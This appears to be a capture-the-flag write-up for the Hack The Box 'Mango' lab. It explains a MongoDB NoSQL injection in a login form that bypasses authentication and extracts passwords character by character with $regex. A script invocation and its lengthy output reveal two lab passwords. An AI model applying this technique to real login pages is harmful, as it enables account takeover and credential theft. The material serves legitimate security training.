NoSQL Injection
The target web application is confirmed to be vulnerable to a NoSQL injection in the POST data field of the login page at index.php file. While this raises a suspicion that the backend DB might be MongoDB, it allowed me to bypass the authentication.
Since the redirected page doesn’t appear to have much going on, I will attempt to exfiltrate user data using the same NoSQL injection technique.
nosql injection is a type of vulnerability where an attacker is able to inject arbitrary text into nosql queries. nosql injections are very similar to the traditional sql injection attack, except that the attack is against a NoSQL database. NoSQL is a general term for any database that does not use SQL, a common database management system (DBMS) that utilizes NoSQL is MongoDB
while there are a lot of online resources available to refer to, the official mongodb documentation shows how some operators can be used for querying
these are the comparison operators, some which can be used for NoSQL Injection
The $regex operator can also be used alongside some symbol;
^: “caret” or “circumflex” that it signifies the start of a string or line in a regular expression pattern.: “wildcard” character or “dot operator” to match any single character except for newline characters*: “quantifier” as in “zero or more” quantifier, indicating that the preceding character or group can occur zero or more times
Combining the operators all together, data exfiltration is achievable more here
Users
Using the $eq operator, the existence of the admin user can be confirmed
The $ne operator was used with an arbitrary text string blahblah
There appears to be another user; mango
Passwords
Using the $regex operator alongside the symbols, I can confirm that the password of the admin user starts with the character, t
Followed by the character,9
The password for the admin user is confirmed to be t9KcS3>!0B#2
The password of the mango user starts with the character, h
The password of the mango user is confirmed to be h3mXK8RhU~f{]f5H
While these 2 credentials for the web application are no use for the web app itself, they must be checked for password reuse
Automated
There is a Python script that automates such rigorous process
The Python script iterates through the all the possible ASCII characters and finds the match
The admin user is found
It additionally finds the other user, mango
┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ python3 nosql-userenum.py -u http://staging-order.mango.htb -m POST -up username -pp password -op login -ep password
No pattern starts with '0'
[...REDACTED...]
No pattern starts with 'g'
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
No pattern starts with 'i'
[...REDACTED...]
No pattern starts with 's'
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2
No pattern starts with 'u'
No pattern starts with 'v'
No pattern starts with 'w'
[...REDACTED...]
No pattern starts with ':'
No pattern starts with ';'
No pattern starts with '<'
No pattern starts with '='
No pattern starts with '>'
No pattern starts with '@'
No pattern starts with '['
No pattern starts with ']'
No pattern starts with '_'
No pattern starts with '`'
No pattern starts with '{'
No pattern starts with '}'
No pattern starts with '~'
No pattern starts with ' '
No pattern starts with ' '
No pattern starts with '
'
'o pattern starts with '
No pattern starts with '
'
No pattern starts with '
'
2 password(s) found:
h3mXK8RhU~f{]f5H
t9KcS3>!0B#2Passwords are also extracted